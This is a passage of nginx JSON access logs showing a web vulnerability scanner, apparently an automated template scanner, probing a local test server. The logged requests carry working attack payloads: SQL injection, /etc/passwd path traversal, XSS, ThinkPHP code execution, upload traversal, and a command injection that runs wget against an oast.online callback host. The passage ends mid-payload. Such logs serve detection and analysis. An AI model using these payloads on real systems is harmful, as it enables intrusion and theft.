+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/components/suggestions?recentlyBrowsed= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://ca28q98smpvbk9ig07h0cbr5pdfk5mdyp.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KFpSPBQrIEJV3Gy8qyzABPTrn')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fca28q98smpvbk9ig07h0iqkjioh8t84xg.oast.online%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/29KFpeT6K9eLpOHndVtH7O9S75p/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-----------------------------253855577425106594691130420583\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22../../../../../tmp/passwd9\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0AMyPasswdNewData->/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KFpSPBQrIEJV3Gy8qyzABPTrn')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /creaprezzi.php?prezzoperiodo4=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = 